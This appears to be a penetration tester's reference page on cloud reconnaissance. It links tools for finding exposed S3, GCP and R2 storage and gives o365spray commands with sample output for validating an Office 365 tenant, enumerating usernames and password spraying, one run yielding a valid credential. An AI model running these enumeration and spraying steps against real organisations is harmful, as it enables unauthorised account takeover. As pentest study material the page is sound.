Cloud

Cloud

Google Dorks

Google Dorks

Online tool

LogoPublic Bucketssecgron
LogoPublic Buckets by GrayhatWarfare
LogoPublic Bucketssecgron

Enumeration - Bruteforce

Cloud Enum

LogoGitHub - initstring/cloud_enum: Multi-cloud OSINT tool. Enumerate public resources in AWS, Azure, and Google Cloud.GitHub
Logocloud-enum | Kali Linux ToolsKali Linux

s3enum

LogoGitHub - koenrh/s3enum: Fast and stealthy Amazon S3 bucket enumeration tool for pentesters.GitHub

lazys3

LogoGitHub - nahamsec/lazys3GitHub

S3Scanner

LogoGitHub - sa7mon/S3Scanner: Scan for open S3 buckets and dump the contentsGitHub

GCP - Find Assets

LogoGitHub - mxrch/GHunt: 🕵️‍♂️ Investigate Google emails and documents.GitHub
LogoGhunt 2.0: Gmail OSINT Guide | Part -1HACKLIDO
ghunt spiderdal -u domain.com

Public AWS S3 Buckets

Scan for sensitive files and secrets - CloudShovel

LogoGitHub - saw-your-packet/CloudShovel: A tool for scanning public or private AMIs for sensitive files and secrets. The tool follows the research made on AWS CloudQuarry where we scanned 20k+ public AMIs.GitHub

Misconf - Permissions ?

AWS

Private and Public SSH Keys Leaked

Cloudflare R2 Buckets

LogoHacking misconfigured Cloudflare R2 buckets: a complete guideIntigriti

O365 / Microsoft 365

Spray - Validate O365

LogoGitHub - 0xZDH/o365spray: Username enumeration and password spraying tool aimed at Microsoft O365.GitHub
$ python3 o365spray.py --validate --domain msplaintext.xyz

            *** O365 Spray ***            

>----------------------------------------<

   > version        :  2.0.4
   > domain         :  msplaintext.xyz
   > validate       :  True
   > timeout        :  25 seconds
   > start          :  2022-04-13 09:46:40

>----------------------------------------<

[2022-04-13 09:46:40,344] INFO : Running O365 validation for: msplaintext.xyz
[2022-04-13 09:46:40,743] INFO : [VALID] The following domain is using O365: msplaintext.xyz

Identify usernames

$ python3 o365spray.py --enum -U users.txt --domain msplaintext.xyz        
                                       
            *** O365 Spray ***             

>----------------------------------------<

   > version        :  2.0.4
   > domain         :  msplaintext.xyz
   > enum           :  True
   > userfile       :  users.txt
   > enum_module    :  office
   > rate           :  10 threads
   > timeout        :  25 seconds
   > start          :  2022-04-13 09:48:03

>----------------------------------------<

[2022-04-13 09:48:03,621] INFO : Running O365 validation for: msplaintext.xyz
[2022-04-13 09:48:04,062] INFO : [VALID] The following domain is using O365: msplaintext.xyz
[2022-04-13 09:48:04,064] INFO : Running user enumeration against 67 potential users
[2022-04-13 09:48:08,244] INFO : [VALID] lewen@msplaintext.xyz
[2022-04-13 09:48:10,415] INFO : [VALID] juurena@msplaintext.xyz
[2022-04-13 09:48:10,415] INFO : 

[ * ] Valid accounts can be found at: '/opt/o365spray/enum/enum_valid_accounts.2204130948.txt'
[ * ] All enumerated accounts can be found at: '/opt/o365spray/enum/enum_tested_accounts.2204130948.txt'

[2022-04-13 09:48:10,416] INFO : Valid Accounts: 2
LogoPassword Spraying Office 365PwnDefend
LogoGitHub - dievus/Oh365UserFinder: Python3 o365 User Enumeration ToolGitHub
LogoOh365UserFinder: identifying valid o365 accounts and domainsCybersecurity News

Brute force

We can instead try to use custom tools such as o365spray or MailSniper for Microsoft Office 365 or CredKing for Gmail or Okta. Keep in mind that these tools need to be up-to-date because if the service provider changes something (which happens often), the tools may not work anymore

$ python3 o365spray.py --spray -U usersfound.txt -p 'March2022!' --count 1 --lockout 1 --domain msplaintext.xyz

            *** O365 Spray ***            

>----------------------------------------<

   > version        :  2.0.4
   > domain         :  msplaintext.xyz
   > spray          :  True
   > password       :  March2022!
   > userfile       :  usersfound.txt
   > count          :  1 passwords/spray
   > lockout        :  1.0 minutes
   > spray_module   :  oauth2
   > rate           :  10 threads
   > safe           :  10 locked accounts
   > timeout        :  25 seconds
   > start          :  2022-04-14 12:26:31

>----------------------------------------<

[2022-04-14 12:26:31,757] INFO : Running O365 validation for: msplaintext.xyz
[2022-04-14 12:26:32,201] INFO : [VALID] The following domain is using O365: msplaintext.xyz
[2022-04-14 12:26:32,202] INFO : Running password spray against 2 users.
[2022-04-14 12:26:32,202] INFO : Password spraying the following passwords: ['March2022!']
[2022-04-14 12:26:33,025] INFO : [VALID] lewen@msplaintext.xyz:March2022!
[2022-04-14 12:26:33,048] INFO : 

[ * ] Writing valid credentials to: '/opt/o365spray/spray/spray_valid_credentials.2204141226.txt'
[ * ] All sprayed credentials can be found at: '/opt/o365spray/spray/spray_tested_credentials.2204141226.txt'

[2022-04-14 12:26:33,048] INFO : Valid Credentials: 1

Power-Pwn

LogoGitHub - mbrg/power-pwn: An offensive security toolset for Microsoft 365 focused on Microsoft Copilot, Copilot Studio and Power PlatformGitHub
PreviousGit DorksNextDNS Subdomain Enumeration

Last updated